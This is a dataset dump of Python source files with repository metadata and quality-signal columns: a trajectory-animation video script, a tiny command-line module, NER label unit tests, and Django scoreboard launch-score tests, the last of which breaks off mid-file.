hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
04a5738f5941bb866cbbef1e059424bd9bfa34f6 | 16,267 | py | Python | fly_plot_lib/animate_cv.py | ROB7-StayHumble/multi_tracker | 1c56650f2af00b84a0cd0f95392727026eae12ce | [
"MIT"
] | null | null | null | fly_plot_lib/animate_cv.py | ROB7-StayHumble/multi_tracker | 1c56650f2af00b84a0cd0f95392727026eae12ce | [
"MIT"
] | null | null | null | fly_plot_lib/animate_cv.py | ROB7-StayHumble/multi_tracker | 1c56650f2af00b84a0cd0f95392727026eae12ce | [
"MIT"
] | null | null | null | import numpy as np
import cv2
import matplotlib
import matplotlib.pyplot as plt
import time
NAN = np.nan
def draw_cv_trajectory(img, x, y, color, thickness):
if 0:
for i in range(len(x)-3):
try:
cv2.line(img, (int(x[i]), int(y[i])), (int(x[i+1]), int(y[i+1])), color[i].tolist(), thickness)
except:
pass
print 'could not draw trajectory line, length pts: ', len(x), 'i: ', i
for i in range(len(x)):
cv2.circle(img, (x[i],y[i]), 1, color=color[i].tolist(), thickness=-1)
def get_indices(x, y, xmesh, ymesh, radius=1, colors=None):
# pull out non NAN numbers only
x = x[np.isfinite(x)]
y = y[np.isfinite(y)]
ix = [np.argmin( np.abs( xmesh-xval ) ) for xval in x]
iy = [np.argmin( np.abs( ymesh-yval ) ) for yval in y]
'''
ix_enlarged = []
iy_enlarged = []
if colors is not None:
colors_enlarged = []
for n, i in enumerate(ix):
min_i = np.max([0, i-radius])
max_i = np.min([len(xmesh), i+radius])
a = np.arange(min_i, max_i)
ix_enlarged.extend(a)
if colors is not None:
colors_enlarged.extend([colors[n]]*len(a))
for i in iy:
min_i = np.max([0, i-radius])
max_i = np.min([len(ymesh), i+radius])
a = np.arange(min_i, max_i)
iy_enlarged.extend(a)
#if len(ix) == 1:
# return ix[0], iy[0]
#else:
if colors is None:
return ix_enlarged, iy_enlarged
else:
return ix_enlarged, iy_enlarged, colors_enlarged
'''
return ix, iy
def synchronize_frames(x, y, sync_frames, padval=NAN, colors=None, n_frames_before_sync_to_show='all'):
xsync = []
ysync = []
if colors is not None:
colors_sync = []
largest_sync_frame = np.max(sync_frames)
for i, xi in enumerate(x):
padding = [padval]*(largest_sync_frame - sync_frames[i])
xsync.append( np.hstack((padding, x[i])) )
ysync.append( np.hstack((padding, y[i])) )
if colors is not None:
colors_sync.append( np.hstack((padding, colors[i])) )
# pad back
lengths = [len(x) for x in xsync]
length_of_longest_sequence = np.max(lengths)
for i, xi in enumerate(xsync):
padding = [padval]*(length_of_longest_sequence - len(xi))
xsync[i] = np.hstack((xsync[i], padding))
ysync[i] = np.hstack((ysync[i], padding))
if colors is not None:
colors_sync[i] = np.hstack((colors_sync[i], padding))
if n_frames_before_sync_to_show != 'all':
first_frame = largest_sync_frame - n_frames_before_sync_to_show
for i, xi in enumerate(xsync):
xsync[i] = xsync[i][first_frame:]
ysync[i] = ysync[i][first_frame:]
if colors is not None:
colors_sync[i] = colors_sync[i][first_frame:]
if colors is None:
return xsync, ysync
else:
return xsync, ysync, colors_sync
def animate_matrix_2views(x, y, z,
colors=None,
xlim=[0,1],
ylim=[0,1],
zlim=[0,1],
resolution=0.005,
filename='',
sync_frames=[],
framerate=100,
ghost_tail=20,
radius=2,
artist_function_xy=None,
artist_function_xz=None,
colormap='hot',
colornorm=[0,1],
n_frames_before_sync_to_show='all'):
def stack_mats(mat_xy, mat_xz):
# add border to mats
mat_xy[:,0,:] = 0
mat_xy[:,-1,:] = 0
mat_xy[0,:,:] = 0
mat_xy[-1,:,:] = 0
mat_xz[:,0,:] = 0
mat_xz[:,-1,:] = 0
mat_xz[0,:,:] = 0
mat_xz[-1,:,:] = 0
mat = np.vstack((mat_xy, mat_xz))
return mat
xmesh = np.arange(xlim[0], xlim[1], resolution)
ymesh = np.arange(ylim[0], ylim[1], resolution)
zmesh = np.arange(zlim[0], zlim[1], resolution)
mat_xy = np.ones([len(ymesh), len(xmesh), 3], dtype=np.uint8)
mat_xy *= 255
mat_xz = np.ones([len(zmesh), len(xmesh), 3], dtype=np.uint8)
mat_xz *= 255
kernel = np.ones((5,5),np.uint8)
norm = matplotlib.colors.Normalize(colornorm[0], colornorm[1])
color_mappable = matplotlib.cm.ScalarMappable(norm, plt.get_cmap(colormap))
print 'synchronizing trajectories'
if colors is None:
xsync, ysync = synchronize_frames(x, y, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync = synchronize_frames(x, z, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
else:
xsync, ysync, colors_sync = synchronize_frames(x, y, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync, colors_sync = synchronize_frames(x, z, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
colors_sync = np.array(colors_sync)
#this works:
#writer = cv2.VideoWriter(filename,cv.CV_FOURCC('P','I','M','1'),sampleRate,(panelsFrames.shape[1],panelsFrames.shape[0]),True) # works for Linux
# but this works better:
print 'initializing writer'
mat = stack_mats(mat_xy, mat_xz)
writer = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('m','p','4','v'),framerate,(mat.shape[1], mat.shape[0]),True) # works on Linux and Windows
print filename
nframes = len(xsync[0])
for frame in range(2,nframes):
s = str(frame) + ' of ' + str(nframes)
print s
mat_xy[:,:,:] = 255
mat_xz[:,:,:] = 255
if artist_function_xy is not None:
mat_xy = artist_function_xy(mat_xy)
if artist_function_xz is not None:
mat_xz = artist_function_xz(mat_xz)
first_frame = np.max([0, frame-ghost_tail])
last_frame = frame
x = xsync[:, first_frame:last_frame]
y = ysync[:, first_frame:last_frame]
z = zsync[:, first_frame:last_frame]
#alpha = np.arange(first_frame, last_frame).reshape(1,last_frame-first_frame).astype(np.float32)
#alpha /= float(last_frame)
#alpha *= 255
#alpha = alpha.astype(np.uint8)
#alpha = np.repeat(alpha, len(x), axis=0)
x = np.reshape(x, x.shape[0]*x.shape[1])
y = np.reshape(y, y.shape[0]*y.shape[1])
z = np.reshape(z, z.shape[0]*z.shape[1])
#alpha = np.reshape(alpha, alpha.shape[0]*alpha.shape[1])
if colors is not None:
c = colors_sync[:, first_frame:last_frame]
c = np.reshape(c, c.shape[0]*c.shape[1])
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
#rgba[:,3] = alpha
#print rgba
if len(x) > 1:
if colors is None:
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
else:
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
# draw the ghost tails
draw_cv_trajectory(mat_xy, indicesx, indicesy, rgba, 1)
draw_cv_trajectory(mat_xz, indicesx, indicesz, rgba, 1)
# draw the points as circles
if 1:
x = xsync[:, last_frame]
y = ysync[:, last_frame]
z = zsync[:, last_frame]
c = colors_sync[:, last_frame]
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
for i in range(len(x)):
try:
cv2.circle(mat_xy, (indicesx[i],indicesy[i]), 5, color=rgba[i].tolist(), thickness=-1)
cv2.circle(mat_xz, (indicesx[i],indicesz[i]), 5, color=rgba[i].tolist(), thickness=-1)
except:
pass
mat = stack_mats(mat_xy, mat_xz)
matflipped = np.array(np.flipud(mat))
writer.write(matflipped)
del(x)
del(y)
del(z)
writer.release()
def animate_matrix_3views(x, y, z,
colors=None,
xlim=[0,1],
ylim=[0,1],
zlim=[0,1],
resolution=0.005,
filename='',
sync_frames=[],
framerate=100,
ghost_tail=20,
radius=2,
artist_function_xy=None,
artist_function_xz=None,
artist_function_yz=None,
colormap='hot',
colornorm=[0,1],
n_frames_before_sync_to_show='all'):
def stack_mats(mat_xy, mat_xz, mat_yz):
# add border to mats
mat_xy[:,0,:] = 0
mat_xy[:,-1,:] = 0
mat_xy[0,:,:] = 0
mat_xz[:,0,:] = 0
mat_xz[:,-1,:] = 0
mat_xz[0,:,:] = 0
mat_xz[-1,:,:] = 0
mat_yz[:,-1,:] = 0
mat_yz[0,:,:] = 0
mat_yz[-1,:,:] = 0
# blank mat
mat_blank = np.ones_like(mat_yz)*255
mat_x_stack = np.vstack((mat_xy, mat_xz))
mat_yz_stack = np.vstack((mat_blank, mat_yz))
mat = np.hstack((mat_x_stack, mat_yz_stack))
return mat
xmesh = np.arange(xlim[0], xlim[1], resolution)
ymesh = np.arange(ylim[0], ylim[1], resolution)
zmesh = np.arange(zlim[0], zlim[1], resolution)
mat_xy = np.ones([len(ymesh), len(xmesh), 3], dtype=np.uint8)
mat_xy *= 255
mat_xz = np.ones([len(zmesh), len(xmesh), 3], dtype=np.uint8)
mat_xz *= 255
mat_yz = np.ones([len(ymesh), len(zmesh), 3], dtype=np.uint8)
mat_yz *= 255
kernel = np.ones((5,5),np.uint8)
norm = matplotlib.colors.Normalize(colornorm[0], colornorm[1])
color_mappable = matplotlib.cm.ScalarMappable(norm, plt.get_cmap(colormap))
print 'synchronizing trajectories'
if colors is None:
xsync, ysync = synchronize_frames(x, y, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync = synchronize_frames(x, z, sync_frames, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
else:
xsync, ysync, colors_sync = synchronize_frames(x, y, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync, zsync, colors_sync = synchronize_frames(x, z, sync_frames, colors=colors, n_frames_before_sync_to_show=n_frames_before_sync_to_show)
xsync = np.array(xsync)
ysync = np.array(ysync)
zsync = np.array(zsync)
colors_sync = np.array(colors_sync)
#this works:
#writer = cv2.VideoWriter(filename,cv.CV_FOURCC('P','I','M','1'),sampleRate,(panelsFrames.shape[1],panelsFrames.shape[0]),True) # works for Linux
# but this works better:
print 'initializing writer'
mat = stack_mats(mat_xy, mat_xz, mat_yz)
writer = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('m','p','4','v'),framerate,(mat.shape[1], mat.shape[0]),True) # works on Linux and Windows
print filename
nframes = len(xsync[0])
for frame in range(2,nframes):
s = str(frame) + ' of ' + str(nframes)
print s
mat_xy[:,:,:] = 255
mat_xz[:,:,:] = 255
mat_yz[:,:,:] = 255
if artist_function_xy is not None:
mat_xy = artist_function_xy(mat_xy)
if artist_function_xz is not None:
mat_xz = artist_function_xz(mat_xz)
if artist_function_yz is not None:
mat_yz = artist_function_yz(mat_yz)
first_frame = np.max([0, frame-ghost_tail])
last_frame = frame
x = xsync[:, first_frame:last_frame]
y = ysync[:, first_frame:last_frame]
z = zsync[:, first_frame:last_frame]
#alpha = np.arange(first_frame, last_frame).reshape(1,last_frame-first_frame).astype(np.float32)
#alpha /= float(last_frame)
#alpha *= 255
#alpha = alpha.astype(np.uint8)
#alpha = np.repeat(alpha, len(x), axis=0)
x = np.reshape(x, x.shape[0]*x.shape[1])
y = np.reshape(y, y.shape[0]*y.shape[1])
z = np.reshape(z, z.shape[0]*z.shape[1])
#alpha = np.reshape(alpha, alpha.shape[0]*alpha.shape[1])
if colors is not None:
c = colors_sync[:, first_frame:last_frame]
c = np.reshape(c, c.shape[0]*c.shape[1])
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
#rgba[:,3] = alpha
#print rgba
if len(x) > 1:
if colors is None:
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
else:
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
# draw the ghost tails
draw_cv_trajectory(mat_xy, indicesx, indicesy, rgba, 1)
draw_cv_trajectory(mat_xz, indicesx, indicesz, rgba, 1)
draw_cv_trajectory(mat_yz, indicesy, indicesz, rgba, 1)
# draw the points as circles
if 1:
x = xsync[:, last_frame]
y = ysync[:, last_frame]
z = zsync[:, last_frame]
c = colors_sync[:, last_frame]
rgba = color_mappable.to_rgba(c,bytes=True)
rgba[:,[0, 2]] = rgba[:,[2, 0]] # convert from RGB to BGR
indicesx, indicesy = get_indices(np.array(x), np.array(y), xmesh, ymesh, radius)
indicesx, indicesz = get_indices(np.array(x), np.array(z), xmesh, zmesh, radius)
for i in range(len(x)):
try:
cv2.circle(mat_xy, (indicesx[i],indicesy[i]), 5, color=rgba[i].tolist(), thickness=-1)
cv2.circle(mat_xz, (indicesx[i],indicesz[i]), 5, color=rgba[i].tolist(), thickness=-1)
cv2.circle(mat_yz, (indicesy[i],indicesz[i]), 5, color=rgba[i].tolist(), thickness=-1)
except:
pass
mat = stack_mats(mat_xy, mat_xz, mat_yz)
matflipped = np.array(np.flipud(mat))
writer.write(matflipped)
del(x)
del(y)
del(z)
writer.release()
| 39.009592 | 151 | 0.530522 | 2,134 | 16,267 | 3.861762 | 0.09044 | 0.033976 | 0.033127 | 0.04332 | 0.83849 | 0.820531 | 0.794564 | 0.774178 | 0.766776 | 0.759495 | 0 | 0.023876 | 0.340874 | 16,267 | 416 | 152 | 39.103365 | 0.74473 | 0.077334 | 0 | 0.78169 | 0 | 0 | 0.012039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010563 | 0.017606 | null | null | 0.03169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8e12a0d006fc0ede1083a8b0339435a5b56ced07 | 47 | py | Python | pythonapp/command_line.py | LinodeContent/pythonapp-example | 44ce68236043ee7e8bc97f2677cfa147622557e7 | [
"MIT"
] | null | null | null | pythonapp/command_line.py | LinodeContent/pythonapp-example | 44ce68236043ee7e8bc97f2677cfa147622557e7 | [
"MIT"
] | null | null | null | pythonapp/command_line.py | LinodeContent/pythonapp-example | 44ce68236043ee7e8bc97f2677cfa147622557e7 | [
"MIT"
] | null | null | null | from . import msg
def main():
print(msg())
| 6.714286 | 17 | 0.595745 | 7 | 47 | 4 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234043 | 47 | 6 | 18 | 7.833333 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e3a4d34f659977279caee4309f65a7b29ecbf0e | 2,059 | py | Python | tests/test_utils.py | Andolab/miNER | 4871fce8907a554734e0e70aea33e2adf03c0ce1 | [
"MIT"
] | 3 | 2019-04-06T03:14:01.000Z | 2020-12-14T09:29:58.000Z | tests/test_utils.py | Andolab/miNER | 4871fce8907a554734e0e70aea33e2adf03c0ce1 | [
"MIT"
] | 1 | 2019-01-25T07:52:22.000Z | 2019-03-29T14:38:06.000Z | tests/test_utils.py | Andolab/miNER | 4871fce8907a554734e0e70aea33e2adf03c0ce1 | [
"MIT"
] | 1 | 2019-01-25T08:07:35.000Z | 2019-01-25T08:07:35.000Z | import unittest
from miner.utils import is_begin_of_label, is_end_of_label
class TestUtils(unittest.TestCase):
def test__is_end_of_label(self):
labels = ["B", "I", "O", "S", "B", "I", "I", "E", "O", "O", "B", "B"]
self.assertFalse(is_end_of_label(labels[0], labels[1], "a", "a"))
self.assertTrue(is_end_of_label(labels[1], labels[2], "a", "a"))
self.assertFalse(is_end_of_label(labels[2], labels[3], "a", "a"))
self.assertTrue(is_end_of_label(labels[3], labels[4], "a", "a"))
self.assertFalse(is_end_of_label(labels[4], labels[5], "a", "a"))
self.assertFalse(is_end_of_label(labels[5], labels[6], "a", "a"))
self.assertFalse(is_end_of_label(labels[6], labels[7], "a", "a"))
self.assertTrue(is_end_of_label(labels[7], labels[8], "a", "a"))
self.assertFalse(is_end_of_label(labels[8], labels[9], "a", "a"))
self.assertFalse(is_end_of_label(labels[9], labels[10], "a", "a"))
self.assertTrue(is_end_of_label(labels[10], labels[11], "a", "a"))
self.assertTrue(is_end_of_label(labels[11], "", "a", ""))
self.assertTrue(is_end_of_label("B", "I", "a", "b"))
def test__is_begin_of_label(self):
labels = ["B", "I", "O", "S", "B", "I", "I", "E", "O", "O", "B", "B"]
self.assertTrue(is_begin_of_label(labels[0], "a", "a"))
self.assertFalse(is_begin_of_label(labels[2], "a", "a"))
self.assertTrue(is_begin_of_label(labels[3], "a", "a"))
self.assertTrue(is_begin_of_label(labels[4], "a", "a"))
self.assertFalse(is_begin_of_label(labels[5], "a", "a"))
self.assertFalse(is_begin_of_label(labels[6], "a", "a"))
self.assertFalse(is_begin_of_label(labels[7], "a", "a"))
self.assertFalse(is_begin_of_label(labels[8], "a", "a"))
self.assertFalse(is_begin_of_label(labels[9], "a", "a"))
self.assertTrue(is_begin_of_label(labels[10], "a", "a"))
self.assertTrue(is_begin_of_label(labels[11], "a", "a"))
self.assertTrue(is_begin_of_label("I", "a", "b"))
| 52.794872 | 77 | 0.606119 | 328 | 2,059 | 3.527439 | 0.112805 | 0.175454 | 0.258427 | 0.155575 | 0.876404 | 0.853933 | 0.853933 | 0.727744 | 0.701815 | 0.057044 | 0 | 0.023529 | 0.174356 | 2,059 | 38 | 78 | 54.184211 | 0.657059 | 0 | 0 | 0.0625 | 0 | 0 | 0.036911 | 0 | 0 | 0 | 0 | 0 | 0.78125 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d0399aac2b1f3d19936e1601744effc166e9e90 | 99,766 | py | Python | workspace/ms/scoreboard/tests/test_launch.py | jawaad-ahmad/brata.masterserver | 9fea1aa369fbdc56f0d9b3133bac2f3861e25ae2 | [
"Apache-2.0"
] | 1 | 2015-12-05T05:13:16.000Z | 2015-12-05T05:13:16.000Z | workspace/ms/scoreboard/tests/test_launch.py | jawaad-ahmad/brata.masterserver | 9fea1aa369fbdc56f0d9b3133bac2f3861e25ae2 | [
"Apache-2.0"
] | 64 | 2015-08-27T06:04:38.000Z | 2016-05-04T04:16:53.000Z | workspace/ms/scoreboard/tests/test_launch.py | jawaad-ahmad/brata.masterserver | 9fea1aa369fbdc56f0d9b3133bac2f3861e25ae2 | [
"Apache-2.0"
] | 2 | 2015-08-26T00:59:59.000Z | 2015-08-26T15:20:08.000Z | from django.test import TestCase
from django.utils.timezone import utc
from datetime import datetime
import logging
import mock
from dbkeeper.models import Organization, Team, Setting
from piservice.models import PiStation, PiEvent
import scoreboard.views as target
def _mocked_utcNow():
return datetime(2001, 1, 1, 0, 0, 0).replace(tzinfo=utc)
class ScoreboardStatusLaunchTestCase(TestCase):
def _setUpStations(self):
self.launchStation = PiStation.objects.create(
station_type = PiStation.LAUNCH_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.dockStation = PiStation.objects.create(
station_type = PiStation.DOCK_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.secureStation = PiStation.objects.create(
station_type = PiStation.SECURE_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.returnStation = PiStation.objects.create(
station_type = PiStation.RETURN_STATION_TYPE,
serial_num = self._serialNum
)
self._serialNum += 1
self.station = self.launchStation
def _setUpTeams(self):
org = Organization.objects.create(
name = "School 1",
type = Organization.SCHOOL_TYPE
)
self.team1Name = "Team 1"
self.team1 = Team.objects.create(
name = self.team1Name,
organization = org
)
def _setUpEvents(self):
# Some tests don't need these events. If not needed for a particular
# test, use PiEvent.objects.all().delete()
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 0, 0).replace(tzinfo=utc),
type = PiEvent.EVENT_STARTED_MSG_TYPE
)
def _verify(self,
expectedScore,
expectedDuration_s):
actual = target._recomputeTeamScore(self.team1Name)
actualScore = actual['launch_score']
actualDuration_s = actual['launch_duration_s']
self.assertEqual(expectedScore, actualScore)
self.assertEqual(expectedDuration_s, actualDuration_s)
def setUp(self):
PiEvent._meta.get_field("time").auto_now_add = False
self._serialNum = 1
self._setUpStations()
self._setUpTeams()
self._setUpEvents()
def test_recomputeLaunchScore_noEvents(self):
PiEvent.objects.all().delete()
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_noEventStartedEvent(self, side_effect=_mocked_utcNow):
PiEvent.objects.all().delete()
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_eventsBeforeEventStartedEvent(self, side_effect=_mocked_utcNow):
PiEvent.objects.all().delete()
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 56).replace(tzinfo=utc),
type = PiEvent.SUBMIT_MSG_TYPE,
pi = self.station,
team = self.team1,
status = PiEvent.SUCCESS_STATUS
)
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 59).replace(tzinfo=utc),
type = PiEvent.EVENT_STARTED_MSG_TYPE
)
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_noStartChallengeEvents(self, side_effect=_mocked_utcNow):
e = PiEvent.objects.create(
time = datetime(2001, 1, 1, 0, 0, 0).replace(tzinfo=utc),
type = PiEvent.REGISTER_MSG_TYPE,
team = self.team1,
pi = self.station,
status = PiEvent.SUCCESS_STATUS
)
expectedScore = 0
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventSameTimestampNoSuccessFail(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2001, 1, 1, 0, 0, 0).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 1
expectedDuration_s = 0
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampNoSuccessFail(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
team = self.team1,
pi = self.station
)
expectedScore = 1
expectedDuration_s = 10
self._verify(expectedScore, expectedDuration_s)
@mock.patch('scoreboard.views._utcNow', side_effect=_mocked_utcNow)
def test_recomputeLaunchScore_onlyOneStartChallengeEventEarlierTimestampOneSuccessNoConclude(self, mock_utcNow):
e = PiEvent.objects.create(
time = datetime(2000, 12, 31, 23, 59, 50).replace(tzinfo=utc),
type = PiEvent.START_CHALLENGE_MSG_TYPE,
